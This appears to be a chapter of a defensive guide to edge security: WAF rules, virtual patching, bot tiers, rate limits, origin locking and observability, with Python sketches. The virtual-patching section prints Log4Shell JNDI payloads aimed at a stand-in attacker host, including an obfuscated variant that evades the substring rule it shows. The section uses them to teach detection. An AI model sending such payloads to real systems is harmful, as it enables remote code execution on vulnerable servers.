Patterns
Layered defense, custom WAF rules, virtual patching, bot management strategies, API-specific protection, observability
The patterns that turn off-the-shelf edge security into something tuned to your specific risk surface.
Layered Defense (Defense in Depth)
Don't rely on one layer:
[Client] → [DDoS scrub] L3/L4 absorption
→ [CDN cache] Static content offload
→ [WAF (edge)] Pattern matching
→ [Bot management] Behavior + fingerprint
→ [Rate limiter] Per-key throttling
→ [API gateway] AuthN/AuthZ + per-route limits
→ [App WAF / RASP] Last-mile filtering
→ [Application] Secure code
→ [Origin protection] Allow only edge IPs
Each layer has a different failure mode; an attack that defeats one usually doesn't defeat them all. Cloudflare + AWS WAF on the ALB is a common belt-and-suspenders setup for serious workloads.
Custom WAF Rules
Managed rules cover the common OWASP attack classes. Custom rules cover your specific needs:
# Cloudflare custom rule examples
Block requests where:
http.request.uri.path matches "^/api/internal/" AND
ip.src not in {192.0.2.0/24, 198.51.100.0/24}
Action: Block
Reason: internal endpoints not for public
Allow requests where:
http.request.uri.path eq "/health" AND
ip.src in {10.0.0.0/8, 172.16.0.0/12}
Action: Allow (priority high)
Reason: skip rate limit for monitoring
Challenge requests where:
http.request.method eq "POST" AND
http.request.uri.path eq "/login" AND
cf.threat_score gt 30
Action: Managed Challenge
The pattern: managed rules block the obviously bad; custom rules express your application's specific access rules and exceptions.
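Custom rule logic is easy to get subtly wrong, so it can help to model a rule offline before deploying it. The following is a minimal sketch of the first rule above (internal paths restricted to two networks), written in plain Python rather than in any provider's rule language. The function name `evaluate_internal_rule` is hypothetical; the networks are the documentation ranges used in the rule.

```python
import ipaddress
import re

# Networks allowed to reach internal endpoints (copied from the rule above).
ALLOWED_NETS = [ipaddress.ip_network(n) for n in ("192.0.2.0/24", "198.51.100.0/24")]
INTERNAL_PATH = re.compile(r"^/api/internal/")


def evaluate_internal_rule(path: str, src_ip: str) -> str:
    """Return "block" if the internal-endpoint rule matches, else "pass"."""
    addr = ipaddress.ip_address(src_ip)
    is_internal_path = INTERNAL_PATH.search(path) is not None
    from_allowed_net = any(addr in net for net in ALLOWED_NETS)
    if is_internal_path and not from_allowed_net:
        return "block"
    return "pass"
```

A handful of such cases (allowed network, public address, unrelated path) makes a cheap regression test to run whenever the rule is edited.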
Virtual Patching
A CVE drops for your framework. Patching takes time (test, stage, deploy). A WAF can virtually patch within minutes.
Example: Log4j (CVE-2021-44228). The exploit is a ${jndi:...} string in any input the application logs, such as a header or the request body. WAF rule:
http.user_agent contains "${jndi:" OR
http.request.body contains "${jndi:" OR
any(http.request.headers[*] contains "${jndi:")
Action: Block
You can deploy this in 15 minutes. The Java patch takes a sprint. The virtual patch buys you that time.
The catch: virtual patches are temporary. They protect known exploitation patterns. Don't skip the real fix; the attacker will eventually craft a payload your virtual patch misses.
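To make the catch concrete, here is a small sketch of a substring-based virtual patch and a payload that slips past it. The function `naive_virtual_patch` is a hypothetical stand-in for the WAF rule above, not any vendor's implementation; the nested-lookup payload is one of the obfuscations that circulated for Log4Shell, and `attacker.example` is a placeholder host.

```python
NEEDLE = "${jndi:"


def naive_virtual_patch(headers: dict, body: str) -> bool:
    """Return True if the request should be blocked by a plain substring match."""
    haystacks = list(headers.values()) + [body]
    return any(NEEDLE in value.lower() for value in haystacks)


# The textbook payload is caught.
plain = {"User-Agent": "${jndi:ldap://attacker.example/a}"}

# A nested lookup spells the same thing after Log4j resolves ${lower:j} to "j",
# but the literal substring "${jndi:" never appears on the wire.
obfuscated = {"User-Agent": "${${lower:j}ndi:ldap://attacker.example/a}"}

caught_plain = naive_virtual_patch(plain, "")
caught_obfuscated = naive_virtual_patch(obfuscated, "")
```

Here `caught_plain` is `True` and `caught_obfuscated` is `False`, which is why the rule only buys time until the library itself is upgraded.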
API-Specific Protection
Web traffic and API traffic have very different shapes:
| Web | API |
|---|---|
| Browsers, HTML, JS | Programs, JSON, gRPC |
| Static cacheable | Dynamic, mostly authenticated |
| Bot challenges work | Bot challenges break clients |
| Rate limit by IP | Rate limit by API key |
| WAF rules for SQLi in URL | Rules for SQLi in JSON body |
API-aware protection:
- Schema validation: only POST bodies matching the OpenAPI schema are allowed
- OAuth / API key required: enforce at the edge
- Per-key rate limits: free tier vs paid tier
- Method restrictions: only POST/GET on this endpoint, no PUT/DELETE
- Body content scan: SQLi/XSS patterns in JSON values, not just URLs
Cloudflare API Shield, AWS WAF API protection, Fastly Next-Gen WAF, Salt Security, Noname Security target this segment.
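As an illustration of the schema-validation idea, the sketch below checks a JSON body against a tiny hand-written schema using only the standard library. It is deliberately far simpler than OpenAPI validation; `ORDER_SCHEMA` and `validate_body` are hypothetical names, and a real deployment would more likely lean on the edge product's schema feature or a full validator.

```python
import json

# Hypothetical schema for a POST /orders body: field name -> exact JSON type.
ORDER_SCHEMA = {"sku": str, "quantity": int}


def validate_body(raw: bytes, schema: dict) -> list:
    """Return a list of violations; an empty list means the body is accepted."""
    try:
        body = json.loads(raw)
    except ValueError:  # covers malformed JSON and undecodable bytes
        return ["body is not valid JSON"]
    if not isinstance(body, dict):
        return ["body must be a JSON object"]

    errors = []
    for field, expected in schema.items():
        if field not in body:
            errors.append(f"missing field: {field}")
        elif type(body[field]) is not expected:  # exact match, so True is not an int
            errors.append(f"wrong type for field: {field}")
    # Reject anything the schema does not name, in a stable order.
    for field in sorted(body.keys() - schema.keys()):
        errors.append(f"unexpected field: {field}")
    return errors
```

Rejecting unknown fields and wrong types at the edge means an injection string in a field that should be an integer never reaches the application's parser.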
Bot Management Strategy
Not all bots are bad. Build a tiered strategy:
# Allowlist verified good bots (priority 1)
If: user_agent matches "googlebot|bingbot|slackbot" AND verified
Action: Allow
# Allow known monitoring (priority 2)
If: user_agent matches "uptime-robot|datadog-checks" AND ip in {known_ranges}
Action: Allow
# Challenge suspicious (priority 3)
If: client's TLS fingerprint matches "headless-chrome"
Action: Managed Challenge
# Block known bad
If: ip.src in known_bad_ips OR threat_score > 40
Action: Block
# Default
Action: Allow
For high-value endpoints (login, checkout):
- Always challenge on suspicious signals
- Lower threshold for friction (Turnstile is brief; legitimate users don't mind)
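- Track outcomes: how often does the bot challenge fire? How often is it solved? A high solve rate means the rule is mostly challenging humans, so loosen it; a low solve rate on traffic you know is legitimate means the challenge itself is locking real users out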
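The tiered strategy above is a first-match-wins rule list. A minimal sketch of that evaluation order follows; the `Request` fields and the `first_match` function are hypothetical, and signals such as bot verification or a TLS fingerprint label are assumed to be supplied by the edge provider.

```python
from dataclasses import dataclass


@dataclass
class Request:
    user_agent: str
    verified_bot: bool = False   # assumed to come from the provider's bot verification
    tls_fingerprint: str = ""    # hypothetical label, e.g. "headless-chrome"
    threat_score: int = 0


# (rule name, predicate, action), listed in priority order.
RULES = [
    ("verified-bots", lambda r: r.verified_bot, "allow"),
    ("headless", lambda r: r.tls_fingerprint == "headless-chrome", "challenge"),
    ("known-bad", lambda r: r.threat_score > 40, "block"),
]


def first_match(req: Request) -> tuple:
    """Return (rule name, action) for the first rule whose predicate matches."""
    for name, predicate, action in RULES:
        if predicate(req):
            return name, action
    return "default", "allow"
```

Returning the rule name alongside the action makes it straightforward to count how often each tier fires, which feeds the outcome tracking described above.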
Rate Limiting Strategies
Beyond "X requests per minute":
| Strategy | When |
|---|---|
| Fixed window | Simple but bursty at window boundaries |
| Sliding window | Smooth; preferred for user-facing limits |
| Token bucket | Burst-tolerant; good for API users |
| Leaky bucket | Smooth output; good when origin can't burst |
| Concurrency limit | Limit concurrent requests rather than rate |
| Adaptive | Tighten when error rate or latency rises |
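For reference, a token bucket fits in a few lines. This is a single-process sketch with an injectable clock so it can be tested deterministically; the class and parameter names are illustrative, and an edge deployment would keep the bucket state in shared storage rather than in memory.

```python
import time


class TokenBucket:
    def __init__(self, rate: float, capacity: float, now=time.monotonic):
        self.rate = rate            # tokens refilled per second
        self.capacity = capacity    # maximum burst size
        self._now = now
        self._tokens = capacity     # start full so an initial burst is allowed
        self._last = now()

    def allow(self, cost: float = 1.0) -> bool:
        """Refill based on elapsed time, then spend `cost` tokens if available."""
        current = self._now()
        elapsed = current - self._last
        self._last = current
        self._tokens = min(self.capacity, self._tokens + elapsed * self.rate)
        if self._tokens >= cost:
            self._tokens -= cost
            return True
        return False
```

With `rate=1.0` and `capacity=3`, a client can send three requests back to back and then settles to one request per second, which is the burst tolerance the table refers to.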
Per-endpoint tuning:
/login: 5/min/IP, 100/hour/IP, then challenge
/api/search: 100/min/key, 10k/day/key
/api/checkout: 20/min/key, customer-tier-aware
/health: unlimited
/static/*: CDN-cached, no rate limit needed
The login endpoint deserves the tightest limits: credential stuffing is one of the most common abuse patterns against it.
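A limit such as "5/min/IP" on /login can be sketched as a sliding-window log keyed by client IP. The class below is a single-process illustration with hypothetical names; it keeps one timestamp per accepted request, which is fine for small limits like this one but not for limits in the thousands.

```python
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    def __init__(self, limit: int, window_s: float, now=time.monotonic):
        self.limit = limit
        self.window_s = window_s
        self._now = now
        self._hits = defaultdict(deque)  # key -> timestamps of accepted requests

    def allow(self, key: str) -> bool:
        """Accept the request unless `limit` requests already fall inside the window."""
        current = self._now()
        hits = self._hits[key]
        # Drop timestamps that have aged out of the window.
        while hits and current - hits[0] >= self.window_s:
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(current)
        return True
```

Rejected attempts are not recorded here, so a client that keeps hammering is readmitted once its earlier accepted requests age out; recording rejections too is a stricter variant.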
Geo-Based Controls
Geo blocking is crude but useful:
- Block countries you don't serve: if your business is US-only, blocking the rest of the world removes a large share of opportunistic attack traffic, though not attackers who route through US-based proxies.
- Lower thresholds for high-risk geos: not block, but more aggressive challenges.
- Compliance: data sovereignty rules may require geo-routing to specific regions.
Be careful: legitimate customers on VPNs can appear to come from anywhere. Don't block them; tier the action by risk level.
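Tiering by risk can be as simple as a lookup with an exception list checked first. The sketch below uses placeholder values throughout: `XA` and `XB` are user-assigned ISO 3166 codes standing in for real countries, the exception IP is a documentation address, and `geo_action` is a hypothetical name.

```python
# Placeholder policy tables; none of these values are recommendations.
BLOCKED = {"XA"}                       # countries the business does not serve
CHALLENGED = {"XB"}                    # served, but with more aggressive challenges
SUPPORT_EXCEPTIONS = {"203.0.113.25"}  # customer IPs approved through support


def geo_action(country: str, src_ip: str) -> str:
    """Return "allow", "challenge", or "block" for a request."""
    if src_ip in SUPPORT_EXCEPTIONS:   # exceptions win over any geo rule
        return "allow"
    if country in BLOCKED:
        return "block"
    if country in CHALLENGED:
        return "challenge"
    return "allow"
```

Checking the exception list first means a support-approved customer is never caught by a later geo rule.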
Origin Protection (Hidden Origin)
Edge protection is worthless if attackers can hit your origin directly. Methods:
- Allowlist Cloudflare IPs in your security group / firewall.
- Cloudflare Tunnel / AWS PrivateLink / GCP Private Service Connect: origin has no public IP at all.
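- Authenticated origin pulls: the edge presents a client certificate on every connection; origin rejects connections without it.
- mTLS: the same idea in general form; origin only completes a TLS handshake with a peer holding the WAF's certificate.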
Many a tale of woe: "We have a WAF!" Yes, but dig +short origin.your-app.com resolves to a public IP. Lock it down.
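The allowlist check itself is small. The sketch below tests whether a connecting peer falls inside a set of edge ranges; the ranges shown are documentation placeholders, not any provider's real addresses, and `is_from_edge` is a hypothetical helper. A real deployment would load the provider's published ranges and enforce them in the firewall or security group rather than in application code.

```python
import ipaddress

# Placeholder ranges from the documentation address blocks; substitute the
# edge provider's published IPv4 and IPv6 ranges.
EDGE_RANGES = [ipaddress.ip_network(n) for n in ("192.0.2.0/24", "2001:db8::/32")]


def is_from_edge(peer_ip: str) -> bool:
    """Return True if the connecting peer is inside an allowed edge range."""
    addr = ipaddress.ip_address(peer_ip)
    # Membership across IP versions is simply False, so mixed lists are safe.
    return any(addr in net for net in EDGE_RANGES)
```

Running the same check over origin access logs is one way to detect direct-to-origin traffic that bypassed the edge.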
Observability for Edge Security
Edge events are signal-rich. Ingest them:
- WAF event logs → SIEM (Splunk, Datadog, OpenSearch). Real-time queries.
- Rate-limit hits → metric (waf_rate_limit_block_total{rule="login"})
- Bot scores → Grafana dashboard showing legitimate vs. suspicious traffic mix
- Anomaly alerts: sudden spike in 403s, new IPs, unusual country distribution
Alert on:
- Sudden rule-block-rate increase (might be attack OR new false positive — investigate)
- Authenticated user being blocked (likely false positive; fix urgently)
- Origin traffic from non-WAF IP (origin protection breach)
- DDoS scrubbing engaged (provider notification)
Connect to your Observability Pipelines to route these.
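One way to alert on a sudden block-rate increase is to compare the latest interval against a recent baseline. The sketch below assumes block rates (blocked requests divided by total requests) are already computed per interval; the function name, the `factor` of 3, and the `floor` of 1% are illustrative defaults rather than recommended values.

```python
from statistics import mean


def block_rate_spike(history: list, current: float,
                     factor: float = 3.0, floor: float = 0.01) -> bool:
    """Return True if `current` exceeds `factor` times the recent mean block rate.

    `floor` keeps a near-zero baseline from turning every small blip into an alert.
    """
    if not history:
        return False  # no baseline yet, so stay quiet
    baseline = max(mean(history), floor)
    return current > factor * baseline
```

Because the comparison is relative, the same check covers both a new attack and a freshly deployed rule that is producing false positives; either way a person should look.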
Cookie-Less Sessions and Cache
Modern attackers use the same browser tools as users. Your CDN/WAF must distinguish them without breaking caching:
- Cache by URL + query string only — not by cookie (else cache hit rate craters)
- Bot signals influence rules, not cache — bot gets blocked but cache key is the same
- Separate API routes from cacheable routes: /api/* and /cms/* get different policies
Cache miss rate is the secret cost of misconfigured WAFs. A WAF that breaks cache hit ratio costs you in origin load and latency.
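The "URL + query string only" rule can be sketched as a cache-key function that accepts cookies but never reads them. `cache_key` is a hypothetical helper, not a CDN API; sorting the query parameters is an added assumption so that `?a=1&b=2` and `?b=2&a=1` share one cache entry.

```python
from typing import Optional
from urllib.parse import parse_qsl, urlencode, urlsplit


def cache_key(url: str, cookies: Optional[dict] = None) -> str:
    """Build a cache key from host, path, and sorted query string.

    `cookies` is accepted only to make the point that it is ignored.
    """
    parts = urlsplit(url)
    params = sorted(parse_qsl(parts.query, keep_blank_values=True))
    key = f"{parts.netloc.lower()}{parts.path}"
    query = urlencode(params)
    return f"{key}?{query}" if query else key
```

Two users with different session cookies get the same key for the same URL, so a bot decision made elsewhere in the pipeline cannot fragment the cache.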
Multi-Tenant SaaS Considerations
Different customers, different risk profiles, possibly different regulations:
- Per-tenant WAF rules: enterprise tenants might have stricter custom rules
- Per-tenant rate limits: based on contracted tier
- Tenant isolation: an attack on one tenant shouldn't drown the others
- Audit logs per tenant: customer's security team can review their own traffic
Cloudflare Enterprise and AWS WAF both support per-resource rules; map your tenants to those.
CI for WAF Rules
WAF rules deserve the same engineering discipline as code:
- Store rules in Git (Terraform Cloudflare provider, AWS WAF JSON in Git)
- Code review before changes
- Test in staging WAF first
- Audit log of rule changes
- Tagging of rules (link to ticket / CVE / compliance requirement)
# Terraform Cloudflare provider
resource "cloudflare_ruleset" "waf" {
  zone_id = var.zone_id
  name    = "WAF rules"
  kind    = "zone"
  phase   = "http_request_firewall_custom"
  rules {
    expression  = "(http.request.uri.path matches \"^/api/admin\" and not ip.src in $admin_ips)"
    action      = "block"
    description = "Admin API restricted to known IPs (ticket: SEC-1234)"
  }
}
Anti-Patterns
Block-only WAFs. No log mode, no analysis, just block. You'll either over-block or under-block; you won't know which.
Forgotten origin exposure. WAF protects the edge; origin has a public IP. Attacker just hits origin. Lock it down.
Permanent virtual patches. Virtual patch deployed in panic for CVE X; never followed up with the real fix. Eventually the WAF rule is bypassed.
Single point of failure at the WAF. Cloudflare has outages too. Plan how your service degrades if the WAF is unavailable, and decide in advance between fail-open (risky) and fail-closed (downtime).
Bot management too aggressive. Legitimate users from VPNs / corporate proxies get challenged constantly. Solve rate matters; tune.
Geo-blocks without exceptions for support. Your customer in country X can't reach you. Build the exception process before you need it.
No alerting on WAF metrics. You miss the slow attack that nibbles for a week. Alert on changes, not just thresholds.
What's Next
- Best Practices — tuning false positives, attack runbook, common pitfalls, scaling